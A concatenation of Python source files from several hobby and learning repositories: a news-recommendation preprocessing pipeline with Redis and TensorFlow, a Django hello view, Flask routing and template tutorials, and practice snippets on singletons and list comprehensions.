value_sin = np.sin(2*np.pi*value_scaled)
value_cos = np.cos(2*np.pi*value_scaled)
return value_sin, value_cos
def process_session_clicks_features(sessions_hour, get_article_text_length_fn):
sessions = []
session_count = 0
clicked_articles_ids = []
unique_clicked_articles = set()
#Normalizing numerical features (standardization) and creating time features
for session in sessions_hour:
session_count += 1
#TODO add session view here
for click in session['clicks']:
# local_hour, local_weekday = extract_local_hour_weekday(click['timestamp']//1000,
# "Europe/Oslo")
local_hour, local_weekday = extract_local_hour_weekday(click['timestamp']//1000,
"Asia/Ho_Chi_Minh")
#Normalizing weekday feature
click['weekday'] = (local_weekday+1-3.5)/7
#Transforming the hour in two "cyclic" features, so that the network
#can understand, for example, that there is one hour of difference between both 11pm to 0am and from 0am to 1am
click['time_hour_sin'], click['time_hour_cos'] = get_cicled_feature_value(local_hour, 24)
#Applying standardization on elapsed time
click['_elapsed_ms_since_last_click'] = standardize_num_feature('_elapsed_ms_since_last_click', [click['_elapsed_ms_since_last_click']])[0]
#If active_time_secs is not available, use the average
if 'active_time_secs' not in click:
click['active_time_secs'] = numeric_scalers['active_time_secs']['avg']
#Normalizing reading time by article length (#words)
click['active_time_secs_by_word'] = click['active_time_secs'] / get_article_text_length_fn(click['article_id'])
#Applying standardization
click['active_time_secs_by_word'] = standardize_num_feature('active_time_secs_by_word', [click['active_time_secs_by_word']])[0]
#Removing unnormalized feature
del click['active_time_secs']
#Applying standardization in this feature
#click['active_time_secs'] = standardize_num_feature('active_time_secs', [click['active_time_secs']])[0]
#Copying click attributes as lists in the session
for key in click:
if key != "user_id":
if key not in session:
session[key] = [click[key]]
else:
session[key].append(click[key])
clicked_articles_ids.append(click['article_id'])
unique_clicked_articles.add(click['article_id'])
#Removing clicks property, as its values were copied to individual list columns
del session['clicks']
sessions.append(session)
#Ensuring sessions within the hour are sorted by session id (time)
sessions_df = pd.DataFrame(sessions).sort_values('session_id')
#Printing stats
# print("clicked_articles_ids")
# print(clicked_articles_ids)
clicks_by_articles_counter = dict(Counter(clicked_articles_ids))
clicks_by_articles = np.array(list(clicks_by_articles_counter.values()))
total_clicks = np.sum(clicks_by_articles)
clicks_by_articles_norm = clicks_by_articles / total_clicks
clicks_by_articles_norm_mean = np.mean(clicks_by_articles_norm)
clicks_by_articles_norm_median = np.median(clicks_by_articles_norm)
stats = {'session_count': session_count,
'clicks': total_clicks,
'clicks_by_session': total_clicks / session_count,
'unique_articles': len(unique_clicked_articles),
'clicks_by_article':float(total_clicks)/len(unique_clicked_articles),
'norm_pop_mean': clicks_by_articles_norm_mean,
'norm_pop_median': clicks_by_articles_norm_median,
'gini_index': gini_index(clicks_by_articles.astype(np.float32))
}
print("Stats :{}".format(stats))
# sessions_df: pandas dataframe
# stats: dictionary
# clicks_by_articles_counter: dictionary
return sessions_df, stats, clicks_by_articles_counter
def make_sequence_example(row):
context_features = {
'session_id': tf.train.Feature(int64_list=tf.train.Int64List(value=[row['session_id']])),
'session_size': tf.train.Feature(int64_list=tf.train.Int64List(value=[row['session_size']])),
'session_start': tf.train.Feature(int64_list=tf.train.Int64List(value=[row['session_start']])),
'user_id': tf.train.Feature(bytes_list=tf.train.BytesList(value=[row['user_id'].encode()])),
}
context = tf.train.Features(feature=context_features)
sequence_features = {
'event_timestamp': make_sequential_feature(row["timestamp"]),
#Categorical features
'item_clicked': make_sequential_feature(row["article_id"]),
'city': make_sequential_feature(row["city"]),
# 'region': make_sequential_feature(row["region"]),
# 'country': make_sequential_feature(row["country"]),
# 'device': make_sequential_feature(row["device"]),
'os': make_sequential_feature(row["os"]),
# 'referrer_class': make_sequential_feature(row["referrer_class"]),
'weekday': make_sequential_feature(row["weekday"], vtype=float),
'local_hour_sin': make_sequential_feature(row["time_hour_sin"], vtype=float),
'local_hour_cos': make_sequential_feature(row["time_hour_cos"], vtype=float),
'user_elapsed_ms_since_last_click': make_sequential_feature(row["_elapsed_ms_since_last_click"], vtype=float),
'active_time_secs_by_word': make_sequential_feature(row["active_time_secs_by_word"], vtype=float),
#To debug
'url': make_sequential_feature(row["url"], vtype=str),
}
sequence_feature_lists = tf.train.FeatureLists(feature_list=sequence_features)
return tf.train.SequenceExample(feature_lists=sequence_feature_lists,
context=context
)
def export_sessions_hour_to_tf_records(hour_index, sessions_df, output_path):
export_file_template = output_path.replace('*', '{0:04d}')
print("Exporting hour {} (# sessions: {})".format(hour_index, len(sessions_df)))
save_rows_to_tf_record_file(map(lambda x: x[1], sessions_df.iterrows()),
make_sequence_example,
export_filename=export_file_template.format(hour_index))
def save_nar_preprocessing_resources(output_path, nar_label_encoders_dict, nar_numeric_scalers):
to_serialize = {'nar_label_encoders': nar_label_encoders_dict,
'nar_numeric_scalers': nar_numeric_scalers}
serialize(output_path, to_serialize)
def compute_total_clicks_by_article_stats(clicks_by_articles_counters):
result = defaultdict(int)
for hour_counters in clicks_by_articles_counters:
for article_key in hour_counters.keys():
result[article_key] += hour_counters[article_key]
return result
def delete_all_file_in_path(path):
files = glob.glob(path+'*')
for f in files:
os.remove(f)
def get_date_time_current():
now = datetime.now()
timestamp = int(datetime.timestamp(now))
return timestamp
def parse_newsId_from_url(url):
parse_str = re.search('(?<=-)([\d]+|[\d]+rf[\d]+)(?=.chn)',url)
if parse_str:
parse_str = parse_str.group()
# parse "newsId1rfnewsId2" for popup, return newsId1
# example: cafebiz.vn/te-nuoc-theo-mua-viet-nam-co-nam-co-hoi-giam-lai-suat-dieu-hanh-201908121346105rf20190925103622081.chn
if "rf" in parse_str:
return int(parse_str.split("rf")[0])
return int(parse_str)
else:
return "'<PAD>'"
def preprocess_for_predict(user_id,news_id, get_article_text_length_fn):
# print("==========> Test into preprocess_for_predict")
session = {}
redis = RedisClient("localhost")
page_view_list = redis.getPageView(user_id)
if len(page_view_list) == 0: # empty, new user, have not log redis
# print("=>>>>>>>pageview is empty")
tor = numeric_scalers['active_time_secs']['avg']# i give agv
page_view = PageView("-" + news_id + ".chn", get_date_time_current(), 0, tor)
page_view_list.append(page_view)
user_info = Session(user_id, 0,get_date_time_current(), 1)
# user_info.guid = user_id
# user_info.locId = 0
# user_info.osCode = 1
# user_info.timeNow = get_date_time_current()
session['session_size'] = len(page_view_list)
session['session_id'] = user_info.timeNow
session['session_start'] = user_info.timeNow
session['user_id'] = user_info.guid
else:
# count agv tor pageview
# print("=>>>>>>>pageview is no empty")
tor = 0
for i in range(0, len(page_view_list)):
tor += page_view_list[i].timeOnRead
tor = tor/len(page_view_list)
page_view = PageView("-"+news_id+".chn",get_date_time_current(),0,tor)
page_view_list.append(page_view)
# print("<<<<<<<<<<<,,page_view_list>>>>>>>>>>>>")
# for i in range(0, len(page_view_list)):
# print(page_view_list[i])
# print(page_view_list)
user_info = redis.getUserInfo(user_id)
session['session_size'] = len(page_view_list)
session['session_id'] = user_info.timeNow
session['session_start'] = user_info.timeNow
session['user_id'] = user_info.guid
#Get output filename
output_file_name = str(user_info.timeNow)+"_"+str(user_info.guid)+".tfrecord.gz"
clicks = []
pickle =ACR_Pickle_Singleton.getInstance()
for pv in page_view_list:
click = {}
click['_elapsed_ms_since_last_click'] = (pv.timeNow - user_info.timeNow)*1000
click['active_time_secs'] = pv.timeOnRead
# print("============================================="+ str(parse_newsId_from_url(pv.url)))
click['article_id'] = pickle.get_article_id_encoded(parse_newsId_from_url(pv.url))
click['city'] = user_info.locId
click['os'] = user_info.osCode
click['timestamp'] = pv.timeNow * 1000
click['url'] = pv.url
click['user_id'] = user_info.guid
# test tungtv
# print(" click['user_id'] {}:".format(click['user_id']))
# print(" click['article_id'] {}".format(click['article_id']))
clicks.append(click)
session['clicks'] = clicks
sessions = []
session_count = 0
clicked_articles_ids = []
unique_clicked_articles = set()
#Normalizing numerical features (standardization) and creating time features
#TODO add session view here
for click in session['clicks']:
# local_hour, local_weekday = extract_local_hour_weekday(click['timestamp']//1000,
# "Europe/Oslo")
local_hour, local_weekday = extract_local_hour_weekday(click['timestamp']//1000,
"Asia/Ho_Chi_Minh")
#Normalizing weekday feature
click['weekday'] = (local_weekday+1-3.5)/7
#Transforming the hour in two "cyclic" features, so that the network
#can understand, for example, that there is one hour of difference between both 11pm to 0am and from 0am to 1am
click['time_hour_sin'], click['time_hour_cos'] = get_cicled_feature_value(local_hour, 24)
#Applying standardization on elapsed time
click['_elapsed_ms_since_last_click'] = standardize_num_feature('_elapsed_ms_since_last_click', [click['_elapsed_ms_since_last_click']])[0]
#If active_time_secs is not available, use the average
if 'active_time_secs' not in click:
click['active_time_secs'] = numeric_scalers['active_time_secs']['avg']
#Normalizing reading time by article length (#words)
click['active_time_secs_by_word'] = click['active_time_secs'] / get_article_text_length_fn(click['article_id'])
#Applying standardization
click['active_time_secs_by_word'] = standardize_num_feature('active_time_secs_by_word', [click['active_time_secs_by_word']])[0]
#Removing unnormalized feature
del click['active_time_secs']
#Applying standardization in this feature
#click['active_time_secs'] = standardize_num_feature('active_time_secs', [click['active_time_secs']])[0]
#Copying click attributes as lists in the session
for key in click:
if key != "user_id":
if key not in session:
session[key] = [click[key]]
else:
session[key].append(click[key])
clicked_articles_ids.append(click['article_id'])
unique_clicked_articles.add(click['article_id'])
#Removing clicks property, as its values were copied to individual list columns
del session['clicks']
sessions.append(session)
#Ensuring sessions within the hour are sorted by session id (time)
sessions_df = pd.DataFrame(sessions).sort_values('session_id')
output_file = "./nardata/tmp/"+output_file_name
os.makedirs("./nardata/tmp/", exist_ok=True)
# save_rows_to_tf_record_file(map(lambda x: x[1], sessions_df.iterrows()), make_sequence_example, output_file)
# return output_file
a = map(lambda x: make_sequence_example(x[1]), sessions_df.iterrows())
for row in sessions_df.iterrows():
seq_example = make_sequence_example(row[1])
return seq_example.SerializeToString()
return a
def split_string(path):
afiles = []
for root, dirs, files in os.walk(path):
for filename in files:
afiles.append(filename)
afiles.sort()
string = afiles[-1].split('.')[0]
return int(string.split('_')[-1])
def delete_file_keep_in_two_week(path, num_hour):
afiles = []
for root, dirs, files in os.walk(path):
for filename in files:
afiles.append(filename)
afiles.sort()
# a = 24*14
files = afiles[:-num_hour]
for f in files:
os.remove(path + "/" + f)
def main_nar_preprocess_2():
#def main():
# parser = create_args_parser()
# args = parser.parse_args()
print("<=== STARTING NAR PREPROCESS 2 ===> ")
# parameter = load_json_config("./parameter.json")
parameter = load_json_config("./parameter.json")
list_args = parameter["nar_preprocess_2"]
DATA_DIR = parameter["DATA_DIR"]
num_day = list_args["num_day"]
input_sessions_json_folder_path = DATA_DIR + list_args["input_sessions_json_folder_path"]
input_acr_metadata_embeddings_path = DATA_DIR + list_args["input_acr_metadata_embeddings_path"]
input_nar_encoders_dict_path = DATA_DIR + list_args["input_nar_encoders_dict_path"]
number_hours_to_preprocess = list_args["number_hours_to_preprocess"]
output_nar_preprocessing_resources_path = DATA_DIR + list_args["output_nar_preprocessing_resources_path"]
output_sessions_tfrecords_path = DATA_DIR + list_args["output_sessions_tfrecords_path"]
if path.exists(output_nar_preprocessing_resources_path):
pass
else:
import os
os.makedirs(output_nar_preprocessing_resources_path)
print('Loading resources generated ACR module (articles metadata)')
# truyen file
get_article_text_length_fn, get_article_id_encoded_fn = load_acr_module_resources(get_all_file(input_acr_metadata_embeddings_path)[0])
#get_article_text_length_fn = None
# # degub
# print(get_article_text_length_fn)
print('Loading resources generated by the first step of NAR preprocessing (cat. features dict encoders)')
nar_encoders_dict = load_nar_module_resources(get_all_file(input_nar_encoders_dict_path)[0])
print('Loading sessions from folder: {}'.format(input_sessions_json_folder_path))
print('Exporting TFRecords to: {}'.format(output_sessions_tfrecords_path))
# delete file .part*
# from subprocess import Popen
# var1 = DATA_DIR+input_sessions_json_folder_path+"session_hour=*/.*"
# Process = Popen(['./nar_module/scripts/remove_hiden_file.sh %s' % str(var1)], shell=True)
import os
var1 ='rm -rf '+ input_sessions_json_folder_path + "/session_hour=*/.*"
print(var1)
myCmd = var1
if os.system(myCmd) !=0 :
print("Xoa thanh cong")
else:
print("Xoa That bai")
# split path output_sessions_tfrecords_path
path_tf = DATA_DIR +'/'+list_args["output_sessions_tfrecords_path"].split('/')[1]
if path.exists(path_tf):
pass
else:
import os
os.makedirs(path_tf)
clicks_by_articles_counters = []
#a = preprocess_for_predict("2265891616712405988", get_article_text_length_fn, get_article_id_encoded_fn)
for (hour_index, sessions_hour) in load_sessions_hours(input_sessions_json_folder_path):
# check directory empty:
if len(os.listdir(DATA_DIR+"/sessions_tfrecords_by_hour/")) != 0:
hour_index = split_string(DATA_DIR+"/sessions_tfrecords_by_hour/")+1
print('Processing hour {}'.format(hour_index))
####compute_global_metrics(sessions_hour)
sessions_hour_df, hour_stats, hour_clicks_by_articles_counter = process_session_clicks_features(sessions_hour, get_article_text_length_fn)
#sessions_hour_df.to_csv('hour-{}-to-debug.csv'.format(hour_index))
hour_stats['_hour_index'] = hour_index
#stats.append(hour_stats)
clicks_by_articles_counters.append(hour_clicks_by_articles_counter)
# sessions_hour_df.to_csv(DATA_DIR+"/sessions_tfrecords_by_hour/sessions_hour_df.csv", index=False)
export_sessions_hour_to_tf_records(hour_index, sessions_hour_df,
output_path=output_sessions_tfrecords_path)
# print('')
# if number_hours_to_preprocess >= 0 and hour_index == number_hours_to_preprocess:
# break
print()
print('Exporting Categorical Feature encoders and Numeric scalers dicts: {}'.format(output_nar_preprocessing_resources_path))
save_nar_preprocessing_resources(output_nar_preprocessing_resources_path + "nar_preprocessing_resources.pickle",
nar_encoders_dict,
numeric_scalers)
# delete to keep tf record in 2 week nearest
# after export tfrecord for trainning, delete all file in input_sessions_json_folder_path
if len(os.listdir(DATA_DIR + "/sessions_tfrecords_by_hour/")) > 24*num_day:
delete_file_keep_in_two_week(DATA_DIR+"/sessions_tfrecords_by_hour/", 24*num_day)
# delete_all_file_in_path(input_sessions_json_folder_path)
print("<=== END NAR PREPROCESS 2 ===> ")
if __name__ == '__main__':
main_nar_preprocess_2()
```
#### File: bigdataproj/pick_singleton/pick_singleton.py
```python
from acr_module.acr.acr_module_service import load_json_config
# from nar_module.nar.nar_trainer_cafebiz_full import NAR_Model_Predict
from nar_module.nar.nar_model import get_list_id
from nar_module.nar.nar_utils import load_nar_module_preprocessing_resources
from nar_module.nar.utils import deserialize
from nar_module.nar.benchmarks import SequentialRulesRecommender
class Singleton(type):
"""
An metaclass for singleton purpose. Every singleton class should inherit from this class by 'metaclass=Singleton'.
"""
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class ACR_Pickle_Singleton(object,metaclass=Singleton):
__instance = None
def __init__(self):
parameter = load_json_config("./parameter.json")
list_args = parameter["acr_preprocess"]
self.acr_path = parameter["DATA_DIR"] + "/pickles/acr_articles_metadata_embeddings/acr_articles_metadata_embeddings.pickle"
self.model_nar_dir = parameter["DATA_DIR"] + parameter["model_dir_nar"]
print("Singleton ACR Init")
(acr_label_encoders, articles_metadata_df, content_article_embeddings) = \
deserialize(self.acr_path)
self.acr_label_encoders = acr_label_encoders
self.articles_metadata_df =articles_metadata_df
# self.reverse_acr_article_id = {}
self.reverse_acr_article_id = {v: k for k, v in acr_label_encoders['article_id'].items()}
self.content_article_embeddings_matrix = content_article_embeddings
# get list_id
list_id = get_list_id()
encoded_list_id=[]
for id in list_id:
if (int(id) in acr_label_encoders['article_id']):
encoded_list_id.append(self.get_article_id_encoded(int(id)))
list_id_week_encoded = list(articles_metadata_df['article_id'])[-600:]
encoded_list_id = list_id_week_encoded + encoded_list_id
list_id_week = list(acr_label_encoders['article_id'].keys())[-600:]
self.list_id = list(list_id) + list_id_week
self.encoded_list_id = encoded_list_id
# print("Loading ACR singleton")
ACR_Pickle_Singleton.__instance = self
print("Done SingleTon Init Done")
@staticmethod
def getInstance():
if ACR_Pickle_Singleton.__instance == None:
# print("ACR is none")
ACR_Pickle_Singleton()
return ACR_Pickle_Singleton.__instance
def getUpdateInstance(self, acr_label_encoders,reverse_acr_article_id, articles_metadata_df, content_article_embeddings_matrix):
self.acr_label_encoders = acr_label_encoders
self.reverse_acr_article_id = reverse_acr_article_id
self.articles_metadata_df = articles_metadata_df
self.content_article_embeddings_matrix = content_article_embeddings_matrix
# print("ACR singleton update")
ACR_Pickle_Singleton.__instance = self
print("Into ACR Update Instance")
# NAR_Model_Predict.getUpdateInstance()
return self.acr_label_encoders , self.articles_metadata_df, self.content_article_embeddings_matrix
def getUpdateInstance_byFlask(self):
print("Into ACR Update Instance by Flask")
parameter = load_json_config("./parameter.json")
list_args = parameter["acr_preprocess"]
# acr_path = parameter["DATA_DIR"] + "/pickles/acr_articles_metadata_embeddings_predict/acr_articles_metadata_embeddings_predict.pickle"
# acr_path = parameter["DATA_DIR"] + "/pickles/acr_articles_metadata_embeddings/acr_articles_metadata_embeddings.pickle"
self.model_nar_dir = parameter["DATA_DIR"] + parameter["model_dir_nar"]
(acr_label_encoders, articles_metadata_df, content_article_embeddings) = \
deserialize(self.acr_path)
self.acr_label_encoders = acr_label_encoders
self.articles_metadata_df = articles_metadata_df
# self.reverse_acr_article_id = {}
self.reverse_acr_article_id = {v: k for k, v in acr_label_encoders['article_id'].items()}
self.content_article_embeddings_matrix = content_article_embeddings
# get list_id
list_id = get_list_id()
encoded_list_id = []
for id in list_id:
if (int(id) in acr_label_encoders['article_id']):
encoded_list_id.append(self.get_article_id_encoded(int(id)))
list_id_week_encoded = list(articles_metadata_df['article_id'])[-600:]
encoded_list_id = list_id_week_encoded + encoded_list_id
list_id_week = list(acr_label_encoders['article_id'].keys())[-600:]
self.list_id = list(list_id) + list_id_week
self.encoded_list_id = encoded_list_id
# print("Loading ACR singleton")
ACR_Pickle_Singleton.__instance = self
print("Done Update SingleTon Flask Init Done")
def get_article_id(self, article_id_encoded):
try:
return str(self.reverse_acr_article_id[article_id_encoded])
except Exception as ex:
return self.reverse_acr_article_id['article_id'][0]
def get_article_id_encoded(self,article_id):
try:
return self.acr_label_encoders['article_id'][article_id]
except Exception as ex:
return self.acr_label_encoders['article_id']['<PAD>']
class NAR_Pickle_Singleton(object,metaclass=Singleton):
__instance = None
def __init__(self):
parameter = load_json_config("./parameter.json")
list_args = parameter["acr_preprocess"]
nar_path = parameter["DATA_DIR"] + "/pickles/nar_preprocessing_resources/nar_preprocessing_resources.pickle"
self= load_nar_module_preprocessing_resources(nar_path)
# print("Loading NAR singleton")
NAR_Pickle_Singleton.__instance = self
@staticmethod
def getInstance():
if NAR_Pickle_Singleton.__instance == None:
# print("NAR singleton is none")
NAR_Pickle_Singleton()
return NAR_Pickle_Singleton.__instance
def getUpdaetInstance(self):
print("Into update nar encoder singleton")
parameter = load_json_config("./parameter.json")
list_args = parameter["acr_preprocess"]
nar_path = parameter["DATA_DIR"] + "/pickles/nar_preprocessing_resources/nar_preprocessing_resources.pickle"
self = load_nar_module_preprocessing_resources(nar_path)
# print("Loading NAR singleton")
NAR_Pickle_Singleton.__instance = self
from nar_module.nar.datasets import prepare_dataset_iterator
from nar_module.nar.utils import resolve_files, chunks
import tensorflow as tf
class SRModel_Singleton(object,metaclass=Singleton):
__instance = None
def __init__(self,training_hour=7*24,batch_size=64,truncate_session_length=20):
self.params = {'max_clicks_dist': 10, #Max number of clicks to walk back in the session from the currently viewed item. (Default value: 10)
'dist_between_clicks_decay': 'div' #Decay function for distance between two items clicks within a session (linear, same, div, log, qudratic). (Default value: div)
}
self.training_hour = training_hour
self.batch_size = batch_size
self.truncate_session_length = truncate_session_length
self.clf = SequentialRulesRecommender(None, self.params, None)
self.predictions = {}
SRModel_Singleton.__instance = self
@staticmethod
def getInstance():
if SRModel_Singleton.__instance == None:
# print("NAR singleton is none")
SRModel_Singleton()
return SRModel_Singleton.__instance
def update_rule(self):
clf = SequentialRulesRecommender(None, self.params, None)
clf.rules['test'] = 2
nar_label_encoders = NAR_Pickle_Singleton.getInstance()
self.train(clf,nar_label_encoders)
def train(self, clf,nar_label_encoders):
from nar_module.nar.nar_trainer_cafebiz_full import get_session_features_config
session_features_config = get_session_features_config(nar_label_encoders)
train_data = self.get_training_files(self.training_hour)
# print(train_data)
it = prepare_dataset_iterator(train_data, session_features_config,
batch_size=self.batch_size,
truncate_session_length=self.truncate_session_length)
count = 0
with tf.Session() as sess:
while True:
try:
data_it = sess.run(it)
#convert encoded id to id
acr_pickle = ACR_Pickle_Singleton.getInstance()
# print("BEFORE")
# print("CLICKED")
# print(data_it[0]['item_clicked'])
# print("LABEL")
# print(data_it[1]['label_next_item'])
# data_it[0]['item_clicked'].astype(str)
# data_it[1]['label_next_item'].astype(str)
self.convert_encoded_ids(data_it[0]['item_clicked'])
self.convert_encoded_ids(data_it[1]['label_next_item'])
count +=1
clf.train(data_it[0]['user_id'],data_it[0]['session_id'],
data_it[0]['item_clicked'],data_it[1]['label_next_item'])
except tf.errors.OutOfRangeError:
break
print("Total training sample: "+ str(count*self.batch_size))
# print("-----------------")
# print(clf.rules)
# print("int 20190607183749984")
# print(clf.rules[20190607183749984])
# print("str 20190607183749984")
# print(clf.rules["20190607183749984"])
# print(self.clf.rules[5108])
self.clf = clf
def convert_encoded_ids(self,clickeds_all_items):
acr_pickle = ACR_Pickle_Singleton.getInstance()
for i,clicked_items in enumerate(clickeds_all_items):
for j,item in enumerate(clicked_items):
if item != 0:
clickeds_all_items[i][j] = acr_pickle.get_article_id(item)
def get_training_files(self, training_hour):
parameter = load_json_config("./parameter.json")
training_dir = parameter["DATA_DIR"]+ parameter["nar_preprocess_2"]["output_sessions_tfrecords_path"]
train_files = resolve_files(training_dir)[-training_hour:]
# print("TrainFile")
# print(train_files)
return list(chunks(train_files, training_hour))
def predict(self, item_id, valid_items, topk=100,topk_per_item=10):
return self.clf.predict_topk(item_id, topk, topk_per_item, valid_items)
# def pre_calculate_result(news_id_list):
def main():
nar_label_encoders = NAR_Pickle_Singleton.getInstance()
srclassifier = SRModel_Singleton()
sr = SequentialRulesRecommender(None, srclassifier.params, None)
sr.rules['test'] = 1
srclassifier.train(sr,nar_label_encoders)
print(srclassifier.clf.rules['test'])
# srclassifier.update_rule()
# print(srclassifier.clf.rules['test'])
# print("------------------")
# print(srclassifier.predict(3648,100,10,None))
# print(len(set(srclassifier.predict(3648,100,10,None))))
if __name__ == '__main__':
main()
```
#### File: bigdataproj/session_module/sessiondata_pb2_grpc.py
```python
import grpc
import session_module.sessiondata_pb2 as sessiondata__pb2
class SessionDataServiceStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetSessionData = channel.unary_unary(
'/SessionDataService/GetSessionData',
request_serializer=sessiondata__pb2.SessionRequestInfo.SerializeToString,
response_deserializer=sessiondata__pb2.ListsSessions.FromString,
)
self.PingSess = channel.unary_unary(
'/SessionDataService/PingSess',
request_serializer=sessiondata__pb2.PingSessRequest.SerializeToString,
response_deserializer=sessiondata__pb2.PingSessResponse.FromString,
)
class SessionDataServiceServicer(object):
# missing associated documentation comment in .proto file
pass
def GetSessionData(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PingSess(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SessionDataServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetSessionData': grpc.unary_unary_rpc_method_handler(
servicer.GetSessionData,
request_deserializer=sessiondata__pb2.SessionRequestInfo.FromString,
response_serializer=sessiondata__pb2.ListsSessions.SerializeToString,
),
'PingSess': grpc.unary_unary_rpc_method_handler(
servicer.PingSess,
request_deserializer=sessiondata__pb2.PingSessRequest.FromString,
response_serializer=sessiondata__pb2.PingSessResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'SessionDataService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
``` |
{
"source": "13528770807/django_celery",
"score": 2
} |
#### File: qiang_celery/qiang_celery/view.py
```python
from django.http import HttpResponse
from django.shortcuts import render
def hello(request):
return HttpResponse('hello world !')
def index(request):
print('---------1----------')
context = {}
context['hello'] = " Hello the World"
print(context)
return render(request, 'hello.html', context)
``` |
{
"source": "13528770807/flask_project",
"score": 3
} |
#### File: qiang00_before_project/qiang01_view_and_route/q02_route.py
```python
from flask import Flask, request, jsonify, redirect, url_for
# 配置对象
# class Config(object):
# DEBUG = True
app = Flask(__name__)
# app.config.from_object(Config) # 对象
# app.config.from_pyfile('config.ini') # 配置文件
# app.config.from_envvar('CONFIGABC') # 环境变量
@app.route('/demo1')
def demo1():
return "demo1"
@app.route('/demo2/<user_id>')
def demo2(user_id):
return 'demo2 %s' % user_id
@app.route('/demo3/<int:user_id2>', methods=['GET', 'POST'])
def demo3(user_id2):
return 'demo3 %d %s' % (user_id2, request.method)
@app.route('/demo4')
def demor():
json = {
'name': 'zhangsan',
'age': 30
}
return jsonify(json)
@app.route('/demo5')
def demo5():
return redirect('https://www.baidu.com')
@app.route('/demo6')
def demo6():
return redirect(url_for('demo3', user_id2=999))
@app.route('/demo7')
def demo7():
return 'code 666', 666
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True)
```
#### File: qiang00_before_project/qiang02_the_template/q02_add_template_filter.py
```python
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
li = [1, 2, 3, 4, 5, 6, 7]
return render_template('filter.html', li=li)
@app.template_filter('li_rv2') # 添加过滤器 方法二
def li_reverse(li):
res = list(li)
res.reverse()
return res
# app.add_template_filter(li_reverse, 'li_rv') # 添加过滤器 方法一
if __name__ == "__main__":
app.run(debug=True)
```
#### File: qiang00_before_project/qiang02_the_template/q04_01_template_code_reuse_macro.py
```python
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/test_macro')
def test_macro():
return render_template('test_macro.html')
@app.route('/macro')
def macro():
return render_template('macro.html')
@app.route('/')
def index():
return 'hello'
if __name__ == "__main__":
app.run()
```
#### File: qiang00_before_project/qiang02_the_template/q05_variable_and_function.py
```python
from flask import Flask, render_template, session, g, redirect, url_for, flash
app = Flask(__name__)
app.secret_key = '<KEY>'
@app.route('/set_session_url')
def set_session():
session['company'] = 'zhongruan',
print('------1---------')
return redirect(url_for('index'))
@app.route('/user/<int:user_id>')
def user(user_id):
return 'user_id: %s ' % user_id
@app.route('/')
def index():
g.name = 'zhangsan'
flash('hahahahahaha')
return render_template('variable.html')
if __name__ == "__main__":
app.run(debug=True)
```
#### File: qiang00_before_project/qiang02_the_template/q06_Flask_WTF2.py
```python
from flask import Flask, request, flash, render_template
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField
from wtforms.validators import DataRequired, EqualTo
app = Flask(__name__)
app.config['WTF_CSRF_ENABLED'] = False
app.config['SECRET_KEY'] = 'SECRET_KEY'
class RegistForm(FlaskForm):
username = StringField('用户名:', validators=[DataRequired('请输入用户名:')], render_kw={'placeholder': '占位符'})
password = PasswordField('密码', validators=[DataRequired('请输入密码')])
password2 = PasswordField('确认密码', validators=[DataRequired('确认密码'), EqualTo("password", "两次密码不一致")])
submit = SubmitField('提交')
@app.route('/flaskwtf', methods=['GET', 'POST'])
def flaskwtf():
regist = RegistForm()
if regist.validate_on_submit():
username = request.form.get('username')
password = request.form.get('password')
password2 = request.form.get('password2')
print(username, password, password2)
return 'success'
else:
if request.method == 'POST':
flash('参数不完整')
return render_template('flask_wtf2.html', form=regist)
if __name__ == '__main__':
app.run(debug=True)
``` |
{
"source": "13528770807/practice",
"score": 4
} |
#### File: practice/qiang01_test/zq_06_single.py
```python
""" 装饰器
def singleton(cls):
instance = {}
def foo(*args, **kwargs):
if cls not in instance:
instance[cls] = cls(*args, **kwargs)
return instance[cls]
return foo
@singleton
class Myclass():
a = 1
obj1 = Myclass()
obj2 = Myclass()
print(obj1 == obj2)
"""
# 元类(type)
# class Singleton(type):
# def __init__(self, *args, **kwargs):
# self._instance = None
# super(Singleton, self).__init__(*args, **kwargs)
#
# def __call__(self, *args, **kwargs):
# if not self._instance:
# self._instance = super(Singleton, self).__call__(*args, **kwargs)
#
# return self._instance
#
#
# class Foo(Singleton):
# a = 1
#
#
# obj1 = Foo()
# obj2 = Foo()
# print(obj1 == obj2)
class Singleton2(type):
def __init__(self, *args, **kwargs):
self.__instance = None
super(Singleton2, self).__init__(*args, **kwargs)
def __call__(self, *args, **kwargs):
if self.__instance is None:
self.__instance = super(Singleton2, self).__call__(*args, **kwargs)
return self.__instance
class Foo(object):
__metaclass__ = Singleton2 #在代码执行到这里的时候,元类中的__new__方法和__init__方法其实已经被执行了,而不是在Foo实例化的时候执行。且仅会执行一次。
foo1 = Foo()
foo2 = Foo()
print(Foo.__dict__) #_Singleton__instance': <__main__.Foo object at 0x100c52f10> 存在一个私有属性来保存属性,而不会污染Foo类(其实还是会污染,只是无法直接通过__instance属性访问)
print(foo1 is foo2) # True
```
#### File: practice/qiang06_function/q01_function.py
```python
def foo(a, b, *, d): # 可以传带*的参数
return a+b+d
# printfoo = foo(1, 2, 4) # error
printfoo = foo(1, 2, d=4) # "*"以后的参数必须是关键字参数
print(printfoo)
import builtins
print(dir(builtins)) # 内置作用域
matrix = [
[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
]
# 方法一
list_drived = [[x[i] for x in matrix] for i in range(4)] # 3*4矩阵列表 转成4*3列表
print(list_drived)
# 方法二
ali = list()
for i in range(4):
ali.append([row[i] for row in matrix])
print(ali)
# 方法三
ali3 = list()
for i in range(4):
ali2 = list()
for x in matrix:
ali2.append(x[i])
ali3.append(ali2)
print(ali2)
print(ali3)
# 创建字典
